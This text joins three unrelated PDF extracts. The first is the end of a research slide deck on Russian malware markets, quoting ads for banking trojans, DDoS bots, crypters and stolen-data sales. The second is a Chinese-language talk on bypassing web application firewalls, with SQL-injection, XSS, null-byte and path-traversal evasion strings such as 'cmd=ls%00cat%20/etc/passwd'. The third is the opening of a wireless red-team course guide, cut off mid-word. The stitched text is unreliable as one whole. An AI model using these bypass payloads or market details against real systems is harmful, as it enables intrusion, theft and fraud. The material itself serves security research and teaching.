verify products – Buyers post feedback or questions – Sellers answer and address comments Customer Reviews of Malware • Oleg – Thank you for a FreeJoiner, is the best program in its class I have ever seen, the result of the use was not long in coming, weaknesses and suggestions on the work simply no! • f0rd – It is like this Joiner. The best of me once or seen many useful Fitch, Joiner make this one of the most powerful products on the market. • Zolden – Anticipate just super, which was bought at the height. Works well, connects all the files without exception, to find a new attacker. P.S. Huge RESPECT sponsors of the programme. • -=Humi™=- – Purchased a freejoiner 2 and left very happy....for each user, it's different ... Super Easy, Words can not explain. P.S. Greater Respect author of a remarkable tool! Bots: Suicide DDoS Bot • Suicide DDoS Bot by RKL a.k.a. Cr4sh – Control through web access and IRC – Botmaster controls can be separated at root user level in explorer.exe - ICMP, SYN, HTTP Flood - Injects code into trusted processes - SOCKS4 Proxy - Bindshell - Disguises itself in system through API intercept - Frequency ping bot – The bot is not detected by AV and can use any sort of packer for compression Bots: Illusion DDoS Bot • Illusion DDoS bot by Cyber Underground Project (CUP) – Is sold for up to $400, but older versions are available for free to members of some forums – Can control zombie machines through web access and IRC – Can be used for SYN, ICMP echo, UDP and HTTP GET Flooding – Can spoof IPs and use any source IP for flood command – Frequency ping bot – Multiple commands can be sent in one line via IRC separated by “|” symbol – Injects code into trusted processes – Disguises itself in system through API intercept – Bot password is coded by MD5 encryption to prevent “evil enemy” from learning your password and controlling the botnet – Has easy to use command interface Bots: Illusion DDoS Bot Trojans: Nuclear Grabber • Nuclear Grabber created by Corpse (http://corpsespyware.net) – Can be purchased from corpse, but cracked versions are available – Practically UNIVERSAL TAN (Transaction Authorization Number) grabber • Any bank you choose can be a target – “Technology makes it possible to effectively gather TANs and more” – “Entire process of collection is realized without pop-ups, false pages, false communications and crashed browser at the critical moment.” – Product CAN make transfers (with another tan) and does not require immediate use – Also acts as a consummate phishing tool Trojans: Nuclear Grabber Nuclear Grabber drags forms, captures check and scroll box menus, and defeats virtual keypads All captured information is split into three data streams and sent instantly to both a selected server and redirected to the original domain. Trojans: Nuclear Grabber • There are limited instances of individuals selling data stolen using Nuclear Grabber • D34th (posted 1.31.07) – At the given moment there is by 103 mb. Traffic - USA business. Nothing it touched from the lairs. I sell by the pieces: 8 MB = 6.5 wmz 13.0 MB = 10 wmz 26.1 MB = 20 wmz 26.8 MB = 21 wmz 29.0 MB = 23 wmz I work only through the guarantee, or the patronage on 999 days. Trojans: Pinch • Pinch is a well known trojan that is frequently used for data theft • The tool has gone through a variety of iterations – Originally sold by the creator, Coban2k, then the code was posted for free on-line – Latest version and custom builds can be purchased Trojans: Pinch • Pinch 2.99 – Written in Assembler and is about 20K in size – No special knowledge is needed to use Pinch – Obtains passwords from over 33 different programs including RDP, Outlook, and The Bat! – Sends passwords to you encoded in a pass.bin file by HTTP, SMTP, FTP, or file on local machine. – Supports Socks5 and command shell via telnet. – Compile statistics about the machine. – Changes icons, binds itself to another executable, set starting page for internet browser. – Creates favorites in IE, kill processes or services Trojans: Pinch • Pinch 2.99 – Adds listings information to the hosts file. – Cleans IE – Can turn into IRC-bot • Set server, port, channel and channel password – Starts as service, process, dll or other methods. – Hides itself from msconfig. – Start when online, specific time, or other. – Adds itself to Windows XP SP2 firewall allow list. – 4 Packers to choose from: MEW, UPX, UPACK, FSG Trojans: Pinch • Pinch can be customized for you and built for $30. – Guarantees that it will not be detected by antivirus when you buy it. • Contact 123555 to buy a copy. – Revisions $5 – Statistics server software bought separately ~$100. – Didn’t buy from 12355? Don’t contact for support Trojans: Pinch • New threads regularly appear with individuals selling stolen data obtained through Pinch – In a one week period in March of this year, five individuals sold stolen data obtained through pinch – V-and-h-e Sales of data from Pinch, 100 pieces of data= 3wmz – Aerot1smo I sell the reports of pinch on the track to the price of 100- 2 Traff: Us, Uk, Ru, De, It. Bonus: * to the permanent buyers of reduction! * with purchase 500 (or more) reports, you obtain 100 more! iccQ - 947490 – Kot777 I sell the reports of pinch from 100 pieces for 2 wmz... traffic of miks, during the day there is near 2k- 5k of reports... ICQ 328498627 Trojans: Pinch • Trojan Pinch.I Exim. • You see our tariff plans to log (Records), the famous Trojan Pinch. • We sell two types of logs : 1) Information "booty" the main parser : passwords, auto IE and others. 2) the information intercepted from the IE window, and others (very often hosting accumulators, with $ accumulation, etc.) Price : For one type of reporting : 100 pieces $ 1.5 the minimum order of 200 cards (ie, for $ 3) The two types of reports : 1 mb. , $ 0.3 Minimum order 20 mb. (ie $ 6) The traffic reports : Mostly Russian origin, in the direction of Europe about 39%, USA 15%. Working through code protection or guardian. Reports are delivered in one hand. Trojans: PG Universal Grabber • Power Grabber v1.8 Posted by Admin on 3.27.07 – Works with IE and browsers with IE based engine. – Works as loader, establishes necessary files, records in registry and deletes itself. – Invisible in processes, detours firewalls, invisible to AV. – Sends logs immediately after POST. – Loads files (Loads on UID bot. Can provide loading on other certain bot) – Updates old bots by new build (without restarting). • The full build costs $700 with antivirus protection for another $30 – Standard updates, bug fixes and optimization are free of charge. – Essential updates are charged (50 % from the added cost). Trojans: PG Universal Grabber Grabbing: • http/https inquiries (paypal, ebay, banks, trade, etc...). • FTP connections (Paths are saved in a separate file). • Virtual FLASH/J.S. keyboards (By transfer POST’s inquiry, not ciphered). • Keys Bank of America, and also keys of those banks which use system c *****keys (Deletes keys, answers to confidential questions are retrieved). • Protected Storage (IE/Outlook, Autocomplete Passwords, Fields) Work with E-Gold: • Auto loading in e-gold • Sends info (UID, IP, DateTime, Payee_account, Payer_account, amount) in a log and in admin right after loading. • Knocks on icq after loading. • Account number is retrieved from admin. • After loading site is inaccessible. *Trojan waits when holder accesses his account, then transfers 98 % on the account specified by you. Trojans: PG Universal Grabber Work with TAN: • Uses remote access and adjustment from the administrator’s panel. • TAN’s on DE are registered by default. • Technology works everywhere with the similar work approach(Poland, Lithuania, Netherlands, etc). It is necessary to register name_site + name_TAN. Work with Redirect: • Uses remote control from the admin panel. • Works with redirect using UID bot (After loading establish redirect on a page with a mistake). • Page substitution (http: // Original/login.html => [you are a guest, you cannot view the page. Registration / Login]. • URL Substitution in an address line, the status of bar and page properties. * By default the trojan is completed by fake Wellsfargo, BOA, cajamadrid, lloystb, barclays. Binding Tools: Free Joiner • Free Joiner Polymorphic by GlOFF – First polymorphic joiner “without equal and worthy competitors in the network” • The overall functionality : [+] Glued unlimited number of files of any format and content. [+] Glued to the minimum files (with the default values is 1K). [+] Glued file individual keys (transfer hidden files). [+] Dynamic of stabilizing the body (boot) in the process of compilation. [+] Location stabilizing the body, glued files and information on their location in one section of the file (complexity detects virus). [+] Very high speed unpack files at startup, regardless of their size. [+] The conservation options and settings last glue. [+] You can edit the resulting file to reflect information from other files (.exe, .dll) General optional settings : [+] Select interface language (or Rus Eng). [+] The change icons (. ico. exe. dll). [+] Integrated package goes file (UPX, FGS, MEW, Petite, Upack). • The full build costs 30 wmz, though a free download is available with less functionality. Binding Tools: Free Joiner Encryption Tools: SimbiOZ Cryptor • SimbiOZ Cryptor 1.x by 3xpl01t • Good day. I suggest you cryptor privacy. It is unique in the features Key features : - Encryption-executable files - Hiding file by intercepting API - Hiding process by intercepting API - Firewall not hang a change in the memory usage of injected code. - Source methodology for the selection of code injection can hide file and the process even under the unprivileged user, and not just under admin. - Hiding interception API some anti-rootkit programs (such RootkitRevealer) - Bypassing personal firewalls by masking agent under the annex (Svchost.exe) - Perhaps compress already encrypted file type Packers FSG. - The kit will include private Joiner. - Price : 10 WMZ, 2 updates for free. Encryption Tools: SimbiOZ Cryptor DDoS Services • DDoS Service from hack-shop.org.ru Competitors have started to press? Someone stirs (prevents) to your business? It is necessary to put out of action a site of "opponent"? We are ready to solve yours We offer service on elimination of not desired sites for you. BOT-NET constantly increases! Our bots are in different time zones that allows to hold constantly in online Numerical army of bots, and in difference from other services - it is impossible to close our attack on the country (for example to China :)). 1 hour - 20 $ 24 hours from 100 $ Large projects - from 200 $ depending on complexity of the order. Complexity of the order is defined/determined by width of the channel, filters, a configuration of a server. Forward the full sum undertakes... Spam Services • Spam services from iNFEccTED-TeAM – Respected ladies and gentlemen! we propose to your attention the straight post distribution of the letters of the advertising or information nature. Our address base: legal persons, organization, enterprise, the producers of goods and services, the specialized address base of data (personal selection, and also the start in it of your contacts). Distribution is produced on exclusive software, developed by our command iNFEccTED-TeAM It is professional, it is operational, it is qualitative. our valuations: USA 1) US the partner Quantity --1 200 000 Exclusive base. 2) the physical persons Quantity --3 000 000 Exclusive base. ICQ Numbers • .ka$ta [ ICQ ] - 5d, 6d, 7d, 8d. • 5d: 4444x [ clean ] - $1500 6d: 4x444x [ clean ] - $150 666xx6 [ clean ] - $300 11x111 [ pm ] - $450 x22222 [ clean ] - $750 x00000 [ pm ] - $2500 7d-8d:: 11111xx [ clean ] - $65 1x111x1 [ inv ] - $55 4444xx4 [ inv ] - $50 xx8888x [ inv ] - $50 5x5555x [ inv ] - $50 x6x6666 [ inv ] - $50 11Oct.1111 [ clean ] - $170 2222X22 [ pm ] - $160 55X5555 [ i ] - $170 • Tags from MakZer ' a • XYZ 922242 - 20 wmz 778717 - 17 wmz Stairs 543-002 - 9 wmz 313-789 - 8 wmz 6-654-25 - 6 wmz 475-234 - 5 wmz 15-321-7 - 5 wmz 6-345-06 – 4.5 wmz XYZA 504242 – 6.5 wmz 508804 - 6 wmz 692009 - 6 wmz 313108 - 6 wmz 785572 - 5 wmz 409477 - 5 wmz 383404 - 5 wmz Individuals also regularly buy and sell ICQ numbers and tools Free Tools • Many sites also provided access to free downloads – Older bots and malware – Password scanners – FTP checkers – ICQ tools – Proxy checkers – Articles – Exploits – Warez Purchasing • Individuals interested in purchasing products from a seller must contact them privately – ICQ – E-mail – Private messages in forum • Buyers place orders and pay for services – E-gold – Web money (WM) – Western Union – Escrow payments Organization of Market Actors • There is an organizational continuum of sellers in malware markets based on seller reputation Rippers Unverified Sellers Verified Sellers l----------------------------------l-------------------------------------l • Some forums maintain white and black lists to indicate who is trustworthy – Rippers Database is also an important resource Market Forces in Malware Forums • Four market forces shape relationships and actions in malware markets – Quick turnaround – Low prices – Reliable products – Customer service Neutralizing Behavior • Some sellers and writers made comments to negate their involvement in illegal activity – “the bot is a means of testing its network to the object of vulnerabilities, but not the tool for the attacks and other incorrect actions. For its use for any illegal purposes the author does not bear responsibility.” – “The programme was created for informational purposes and to check your own protection (security). The author is not liable.” Discussion • All manner of malware and information are being sold or made freely available • Prices are generally low and the services available allow anyone to engage in computer crime and identity theft • These markets operate much like legitimate businesses • Malware writers and carders justify their actions much like other criminals Complex Issues • Law enforcement interdiction appears to have a small impact on the black market for malware • May be difficult to attribute the creation of tools to any one individual or group • The language barriers involved can obfuscate the content of forums • A good deal of time, and skilled personnel are needed to monitor and analyze posts • Transitory nature of forums and communications generally Key Terms For Russian Forums Russian English Форум forum сқачать download Закупка purchase Покупка/Продажа purchase/sale карт/кардинг card/carding счетов account Свалка dump Спам spam трояны trojan Личинка bot Червь worm Халява warez программа program хақер hacker wmz web money (US) Relevant Literature • www.cybercrime.gov • The Cybercrime Blackmarket. Retrived from http://www.symantec.com/avcenter/cybercrime/index_page5.html • Computer Security Institute and Federal Bureau of Investigation. 2006 Computer Crime and Security Survey. Retrieved from http://www.cybercrime.gov/FBI2006.pdf • Florio, Elia. 2005. When malware meets rootkits. Retrieved from http://www.symantec.com/avcenter/reference/when.malware.meets.rootkits.pdf • Holt, Thomas J. and Danielle C. Graves. A Qualitative Analysis of Advanced Fee Fraud Schemes. The International Journal of Cyber-Criminology 1(1). • James, Lance. 2006. Trojans & Botnets & Malware, Oh My! Presentation at ShmooCon 2006. Retrived from http://www.shmoocon.org/2006/presentations.html • National White Collar Crime Center and the Federal Bureau of Investigation. 2006. IC3 2005 Internet Crime Report. Retrieved from http://www.ic3.gov/media/annualreport/2005_IC3Report.pdf • National White Collar Crime Center and the Federal Bureau of Investigation. 2007. IC3 2006 Internet Crime Report. Retrieved from http://www.ic3.gov/media/annualreport/2006_IC3Report.pdf Relevant Literature • Ollmann, Gunter. 2004. The Phishing Guide: Understanding and Preventing Phishing Attacks. Retrived from http://www.ngssoftware.com/papers/NISRWP-Phishing.pdf • Parizo, Eric, B. 2005. Busted: The inside story of Operation Firewall. Retrieved from http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1146949,00.html • Savona, Ernesto U. and Mara Mignone. 2004. The Fox and the hunters: How IC technologies change the crime race. European Journal on Criminal Policy and Research 10(1): 3-26. • http://www.secretservice.gov/press/pub2304.pdf • Taylor, Robert W., Tory J. Caeti, D. Kall Loper, Eric J. Fritsch, and John Liederbach. 2006. Digital Crime and Digital Terrorism. Upper Saddle River, NJ: Pearson Prentice Hall. • Thomas, Rob and Jerry Martin. 2006. The underground economy: Priceless. Login 31(6): 7- 16. • Wuest, Candid. 2005. Phishing in the middle of the stream- Today’s threats to on-line banking. Retrieved from http://www.symantec.com/avcenter/reference/phishing.in.the.middle.of.the.stream.pdf
pdf
Bypassing All Bypassing All Web Application Firewalls Web Application Firewalls OuTian <outian@chroot.org> Agenda Agenda  Introduction  What is WAF  Why need WAF  What does WAF do  How to Bypass WAF  Q & A Introduction Introduction  近年來許多企業開始意識到傳統的資安設 備無法防護針對 Web 應用程式的攻擊  因此紛紛開始佈署「Web Application Firewall」(以下簡稱WAF)  本主題要強調的是-WAF並不是萬靈藥, 絕對沒有 100% 的防禦能力,不要再聽 信沒有根據的謠言了!  在設定不當的情況下,有裝跟沒裝一樣 … 傳說中只要拔到獅子的鬃毛 …… 聽說只要裝了 WAF,就可以 萬無一失哦! About Me  OuTian < outian@chroot.org > • 會唸的人叫我 ㄠˋ ㄊㄧㄢ • 不會唸的人叫我「黑糖」、「凹臀」、「熬湯」  現任 • 敦陽科技 資安服務處 資安顧問  經歷 – • HIT2007 – 「Implementation of Web Application Firewall」 • HIT2007/2008 0day Advisory  專長 – • 滲透測試、資安設備佈署 • DDoS攻擊與防護、資安事件緊急應變 What is WAF  深入解析HTTP、HTML、XML內容之 • 網路硬體設備 • 主機式軟體  處理 Client 與 Web Server 間之傳輸  用以防禦針對動態網頁應用程式之攻擊  避免內部之敏感訊息或資料外洩 WAF Vendors (in TW)  (廠牌) - (產品名稱)  AppliCure - dotDefender  Armorize - SmartWAF  Barracuda - Web Application Controller  Cisco - ACE  Citrix - NetScaler  F5 - Big-IP / ASM  Imperva - SecureSphere  Radware - AppWall  …others  (以上依廠牌名稱排序) WAF Vendors (Global)  BeeWare  BinarySEC  Breach / ModSecurity  Deny All  Visonys  ... others 常見 Web 應用程式弱點 (1)  程式過濾不當 • SQL Injection  竊取資料、入侵網站 • Cross Site Scripting  利用網站弱點竊取其他用戶資料 • Arbitrary File Inclusion  入侵網站 • Code/Command Injection  入侵網站 • Directory Traversal  瀏覽敏感資訊檔案 • Buffer Overflow  入侵網站主機 常見 Web 應用程式弱點 (2)  邏輯設計不良 • Cookie Poisoning  變換身份、提升權限 • Parameter Tampering  竄改參數,使應用程式出現不可預期反應 • Upload File Mis-Handling  植入網站木馬 • Information Disclosure  洩露網站資訊 • Weak Authentication  脆弱的認證機制 WAF v.s IDP/IPS  網頁防火牆 • Positive Security Model (正向表列白名單) • 行為模式分析 Behavior Modeling • 置入金鑰/憑證,可解析 SSL封包 • 會追蹤表單/Cookie  入侵偵測系統 • Negative Security Model (負向表列黑名單) • 特表碼辨識 Signature based • 無法解析 SSL 封包 • 不追蹤 表單/Cookie What does WAF do ?  Input Validation • Protocol • URL • Parameter • Cookie/Session  Output Checks • Protocol • Headers • Error Messages • Credit Card Number • Sensitive Information Input Validation Protocol URL Parameter  Normal HTTP Request GET /search?q=test HTTP/1.1 Accept: */* Accept-Language: zh-tw User-Agent: Mozilla/4.0 Accept-Encoding: gzip, deflate Host: www.google.com.tw Connection: Keep-Alive Cookie: SESSIONID=8E938AF24D97 Cookies Protocol Protection  Buffer Overflow  Denial of Service  Abnormal • HTTP Method  GET/POST/HEAD  CONNECT  PUT  DELETE • HTTP Headers  Host  User-Agent  Content Length URL Protection  Forceful Browsing  Configuration Files • *.inc 、 *.cfg 、 *.log  Database Files • *.sql 、 *.mdb  Backup Files • *.bak 、 *.old 、 *.tmp 、 *~  Archive Files • *.rar 、 *.zip 、 *.tgz  Document Files • *.pdf 、 *.xls 、 … Parameter Protection  SQL/Code/Command Injection  Cross Site Scripting  Arbitrary File Inclusion  Directory Traversal  Parameter Tampering Cookie Protection  Session Stealing  Cookie Poisoning Output Checks Protocol Headers  Normal HTTP Response HTTP/1.1 200 OK Date: Sun, 19 Jul 2009 05:43:57 GMT Content-Type: text/html; charset=UTF-8 Server: Apache/2.0.52 X-Powered-By: PHP/4.3.9 <html> <head> <title> … 5520-1234-1234-1234 Xxx Error SQL in … Sensitive Information Header Protection  刪除、修改特定Header • Ex:  Server  X-Powered-By  部份廠牌具有 Cookie Proxy / Cookie Encryption 功能 Sensitive Information Protection  攔截敏感訊息 • 信用卡卡號 • 伺服器錯誤訊息 • 資料庫錯誤訊息 • 指定格式之個人資料字串  處理方式 • 刪除 • 打馬賽客 ( XXX or *** ) • 攔截整個頁面 正向表列 v.s 負向表列  負向表列 • 俗稱「黑名單」 • 佈署快速 • 容易繞過 • 容易誤判  正向表列 • 俗稱「白名單」 • 需時間學習/設定 • 防護嚴謹 • 不會誤判 (除非管理者設定錯誤) How to Bypass WAF  Simple Technique  Negative Model • Magic % • HTTP Parameter Pollution • Special Check  Positive Model • Bypass Condition Simple Technique 簡單的方法 (通常都已防範)  大小寫轉換 (多數WAF忽略大小寫作檢查) • 在 Windows 系統裡, test.asp == TEST.ASP  跳脫字元 • 某些情況下, a = \a  URL編碼 (多數WAF 先作 URL解碼後才作檢查) • 路徑編碼  /test.asp = /%74%65%73%74%2E%61%73%70 • 參數編碼  /etc/passwd = %2F%65%74%63%2F%70%61%73%73%77%64 空白字元的替代方案  常見替代字串 • (空白) = %20 • \t (TAB) = %09 • \n = %0A • \r = %0D  in SQL • /**/ for MSSQL  in XSS • /**/ in some case 模糊路徑  自我參考目錄 • /test.asp == /./test.asp  雙目錄分隔線 • /test.asp == //test.asp  目錄跳脫 • /etc/passwd == /etc/./passwd • /etc/passwd ==/etc/xx/../passwd  目錄分隔符號 • ../../cmd.exe == ..\..\cmd.exe 較複雜的編碼  Double Decoding • / = %2F = %252F  Overlong characters • 0xc0 0x8A = 0xe0 0x80 0x8A = 0xf0 0x80 0x80 0x8A = 0xf8 0x80 0x80 0x80 0x8A  Unicode Encoding • /test.cgi?foo=../../bin/ls = /test.cgi?foo=..%2F../bin/ls = /test.cgi? foo=..%c0%af../bin/ls Null-Byte Attacks  %00  Null Byte (0x00) 於程式語言之判斷函數中 常用以代表字串中止 • strcmp() • strcpy() • sprintf() • …. etc  許多字串檢查機制當偵測到 0x00 即停止對後方 字串作檢查 • /aa.php?cmd=ls%00cat%20/etc/passwd Negative Checks 正常的編碼原理是這樣  字元編碼 • A => %41 • & => %26 • ‘ => %27  正常Scope • %00 ~ %FF  So • select => %73%65%6C%65%63%74 Magic %  當 % 後方兩碼不在正常範圍 … • select  = sele%ct  = s%elect • … 其他例子請自行延伸  可用於繞過所有黑名單檢查機制 (如SQL 、XSS/… etc)  程式語言自動砍掉無效的 % !!!  *** 僅 ASP 語言具有此特性 *** Why Bypass? <iframe> <if%rame> <if%rame> <script> <scr%ipt> <scr%ipt> ;drop table xxx ;dr%op %table xxx ;dr%op %table xxx select * from … sele%ct * fr%om … sele%ct * fr%om … ASP 解讀為 WAF 看到 注入語法 From blog.iis.net  一般網頁應用程式中,同一個頁面、同名 的參數只有一個 • http://www.google.com.tw/search ?hl=zh-TW&q=test  插入多個同名參數,各平台的反應不一致 • 將各參數組合起來 • 取第一個 • 取最後一個 • 成為陣列 (ARRAY) HTTP Parameter Pollution Server enumeration Special Check  SQL  XSS 使用方式  將欲注入的攻擊字串,拆散於同名稱之參 數中  經過 WAF 時,由於並未中到任何特徵碼 ,因此予以放行  進到程式裡,將同參數之字串組合後,即 變回原攻擊碼 Bypass SQL  多數 WAF 針對含有SQL 特徵的參數會特別深 入檢查 • ‘ • ; • SQL 注釋  --  /*  #  設法於攻擊時不帶以上特徵 • 攻擊數字型參數 (不需 ‘ ) • 自行補足後方 SQL 語法,不使用注釋符號 • Magic % Bypass XSS  HTML/CSS/Java Script之語法非常靈 活  大部份 WAF 無法內建所有的pattern ( 容易誤擋)  稍微變形一下即可繞過  XSS Cheat Sheet • http://ha.ckers.org/xss.html Positive Checks Positive Check ?  多數 WAF 雖有自動學習功能  可分析網站正常使用情況下的 • HTTP Method • URL • Parameters • Form • Cookies  …. 但是因為管理員很懶,絕大多數都沒有 去設 Orz 如果有設的情況  規則一 – • http://www.test.com/news.asp • id • 限制  格式為 整數 ( ^\d+$ )  長度為 1 ~ 20  規則二 – • http://www.test.com/login.asp • Username • 限制  格式為英文+數字+底線 ( ^[_a-zA-Z0-9]+$ )  長度為 1 ~ 12  …… 很多條類似的規則 繞過的方法  …  …  不 要 中 到 檢 查 的 條 件 ! • Policy Condition • URL • Parameter • … etc Why ?  大網站的 URL/參數 太多太多了  沒設到的地方,WAF不知道格式為什麼, 只好先放過、再學習  以先前提到之字串修改、編碼、糢糊路徑 、Magic %等方法,不要中到WAF中指 定之條件即可 實際案例  www.test.com = IP: x.x.x.x • 設定當 網址 == www.test.com 或 網址 == x.x.x.x 時,套入某profile作檢查  繞過方法 • 不帶 Host Header • 連接 www.test.com:80 • 修改 hosts檔,帶入任何 Host Header 網頁應用程式安全防護 Define Design Develop/Test Deploy Maintain Security requirements Risk analysis Static analysis (tools) Dynamic testing Design review 風險分析 程式碼靜態檢查 滲透測試 & 網站弱點掃描 Continuous monitoring 網頁應用程式防火牆 安全程式教育訓練 DEMO Q & A Reference  WAF Reviews • http://sites.google.com/a/wafreviews.com/home /Home  OWASP AppSecEU09 Poland • HTTP Parameter Pollution • Web Application Firewalls: What the vendors do NOT want you to know  WAFEC, or how to choose WAF technology  Split and Join • http://www.milw0rm.com/papers/340  SQL Injection Hijinks • http://blogs.technet.com/neilcar/archive/2008/1 0/31/sql-injection-hijinks.aspx
pdf
1 Advanced Wireless Attacks Against Enterprise Networks Course Guide Version 1.0.2 Gabriel Ryan @s0lst1c3 @gdssecurity gryan@gdssecurity.com solstice.me 2 Introduction ........................................................................................................................... 3 Lab Setup Guide ...................................................................................................................... 3 Target Identification Within A Red Team Environment ........................................................... 3 Chapter Overview .......................................................................................................................................... 3 Scoping A Wireless Assessment: Red Team Style .......................................................................................... 5 Linguistic Inference .................................................................................................................................... 5 Sequential BSSID Patterns ......................................................................................................................... 5 OUI Prefixes ............................................................................................................................................... 6 Using Geographic Cross-Referencing To Identify In-Scope Access Points .................................................... 6 Expanding The Scope By Identifying Sequential BSSIDs ................................................................................ 7 Attacking And Gaining Entry To WPA2-EAP Wireless Networks ............................................... 9 Chapter Overview .......................................................................................................................................... 9 Wireless Theory: Evil Twin Attacks ................................................................................................................ 9 Wireless Theory: WPA2-EAP Networks ....................................................................................................... 10 Evil Twin Attack Using Hostapd-WPE .......................................................................................................... 13 Lab Exercise: Evil Twin Attack Against WPA2-PEAP ................................................................................ 16 Wireless Man-In-The-Middle Attacks ...................................................................................... 17 Chapter Overview ........................................................................................................................................ 17 Configuring Linux As A Router ..................................................................................................................... 18 Lab Exercise: Using Linux As A Router ..................................................................................................... 21 Classic HTTPS Downgrade Attack ................................................................................................................ 21 Lab Exercise: Wireless MITM With And HTTP Downgrade ...................................................................... 23 Downgrading Modern HTTPS Implementations Using Partial HSTS Bypasses ............................................ 23 Lab Exercise: Wireless MITM With Partial HSTS Bypass ......................................................................... 27 SMB Relays And LLMNR/NBT-NS Poisoning .............................................................................. 28 Chapter Overview ........................................................................................................................................ 28 LLMNR And NBT-NS Poisoning Using Responder ........................................................................................ 28 Lab Exercise: LLMNR/NBT-NS Poisoning ................................................................................................. 30 SMB Relay Attacks With impacket ............................................................................................................... 30 Lab Exercise: SMB Relay Attacks ............................................................................................................. 34 Firewall And NAC Evasion Using Indirect Wireless Pivots ........................................................... 35 Chapter Overview .................................................................................................................................... 35 Configuring Linux As A Captive Portal ......................................................................................................... 35 Lab Exercise: Captive Portal .................................................................................................................... 38 Wireless Theory: Hostile Portal Attacks ...................................................................................................... 38 Wireless Redirect To SMB With LLMNR And NBT-NS Poisoning ................................................................. 44 Lab Exercise: Wireless Redirect To SMB With LLMNR/NBT-NS Poisoning .............................................. 45 Conclusion ........................................................................................................................... 46 Resources............................................................................................................................. 47 Advanced Wireless Attacks Against Enterprise Networks Introduction © 2017 Gabriel Ryan All Rights Reserved 3 Introduction Welcome to Advanced Wireless Attacks Against Enterprise Networks. In this workshop we’ll be going a few steps beyond classic techniques such as ARP replay attacks and WPA handshake captures. Instead we will focus on learning how to carry out sophisticated wireless attacks against modern corporate infrastructure. Our ultimate goal will be to learn how to leverage wireless as a means of gaining access to protected enterprise networks, and to escalate access within those networks to access sensitive data. There will be some overlap between the material covered in this course guide and material that would be more appropriate in a book about internal network penetration testing. This is unavoidable, since wireless and internal network penetration testing go hand-in-hand. They are both part of the same process of gaining unauthorized access to the network, then escalating that access as far as possible until full organizational compromise is achieved. However, in an effort to keep the scope of this workshop manageable, we’re going to focus on testing from a wireless perspective as much as possible. Lab Setup Guide Before we begin, it is recommended that you complete the lab setup guide that was included with this document. Depending on your previous experience using Active Directory and VirtualBox, it could take between two to five hours to complete the lab setup process. Please do not hesitate to reach out to the instructor should you encounter difficulties. Target Identification Within A Red Team Environment Chapter Overview Like any form of hacking, well executed wireless attacks begin with well-executed recon. During a typical wireless assessment, the client will give you a tightly defined scope. You’ll be given a set of ESSIDs that you are allowed to engage, and you may even be limited to a specific set of BSSIDs. During red team assessments, the scope is more loosely defined. The client will typically hire your company to compromise the security infrastructure of their entire organization, with a very loose set of restrictions dictating what you can and can’t do. To understand the implications of this, let’s think about a hypothetical example scenario. Evil Corp has requested that your firm perform a full scope red team assessment of their infrastructure over a five week period. They have 57 offices across the US and Europe, most of which have some form of wireless network. The client seems particularly interested in wireless as a potential attack vector. You and your team arrive at one of the client sites and perform a site-survey using airodump-ng, and see the output shown below. Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 4 CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID 1C:7E:E5:E2:EF:D9 -66 10 572 283 0 1 54 WPA2 CCMP MGT 1C:7E:E5:E2:EF:D8 -66 11 569 83 1 1 54 WPA2 CCMP MGT 1C:7E:E5:E2:EF:D7 -66 12 580 273 0 1 54 WPA2 CCMP MGT 1C:7E:E5:E2:EF:D6 -66 10 566 43 0 1 54 WPA2 CCMP MGT 1C:7E:E5:62:32:21 -68 11 600 24 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A4 -68 0 598 82 2 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A5 -68 9 502 832 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:B1 -64 14 602 23 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A6 -65 12 601 42 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A7 -62 12 632 173 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A8 -62 10 601 21 1 11 54 WPA2 CCMP MGT 00:17:A4:06:E4:C6 -74 10 597 12 0 6 54 WPA2 TKIP MGT 00:17:A4:06:E4:C7 -74 8 578 234 0 6 54 WPA2 TKIP MGT 00:17:A4:06:E4:C8 -74 10 508 11 1 6 54 WPA2 TKIP MGT 00:17:A4:06:E4:C9 -72 11 535 12 0 1 54 WPA2 TKIP MGT 00:13:E8:80:F4:04 -74 11 521 132 0 1 54 WPA2 TKIP MGT prN67n 00:22:18:38:A4:64 -68 12 576 10 0 3 54 WPA2 CCMP MGT ASFWW 00:22:18:38:A4:65 -68 12 577 431 0 3 54 WPA2 CCMP MGT ASFWW None of the networks within range have an ESSID that conclusively ties them to Evil Corp. Many of them do not broadcast ESSIDs, and as such lack any identification at all. To make matters worse, the branch location your team is scoping out is immediately adjacent to a major bank, a police station, and numerous small retail outlets. It is very likely that many of the access points that you see in your airodump-ng output belong to one of these third parties. During some engagements, you may be able to reach out to the client at this point and ask for additional verification. More likely, however, you’ll have to identify in-scope targets yourself. Let’s talk about how to do this. Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 5 Scoping A Wireless Assessment: Red Team Style We have four primary techniques at our disposal that we can use to identify in-scope wireless targets: ▪ Linguistic Inference ▪ Sequential BSSID patterns ▪ Geographic cross-referencing ▪ OUI Prefixes Let’s talk about each of these techniques in detail. Linguistic Inference Using Linguistic Inference during wireless recon is the process of identifying access points with ESSIDs that are linguistically similar to words or phrases that the client uses to identify itself. For example, if you are looking for access points owned by Evil Corp and see a network named “EvilCorp-guest”, it is very likely (although not certain) that this network is in-scope. Similarly, if you’re pentesting Evil Corp but see an ESSID named “US Department of Fear,” you should probably avoid it. Sequential BSSID Patterns In our airodump-ng output, you may notice groups of BSSIDs that increment sequentially. For example: 1C:7E:E5:E2:EF:D9 1C:7E:E5:E2:EF:D8 1C:7E:E5:E2:EF:D7 1C:7E:E5:E2:EF:D6 When you see a group of APs with BSSIDs that increment sequentially, as shown above, it usually means that they are part of the same network. If we identify one of the BSSIDs as in-scope, we can usually assume that the same is true for the rest of the BSSIDs in the sequence. 1C:7E:E5:E2:EF:D9 1C:7E:E5:E2:EF:D8 1C:7E:E5:E2:EF:D7 1C:7E:E5:E2:EF:D6 Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 6 OUI 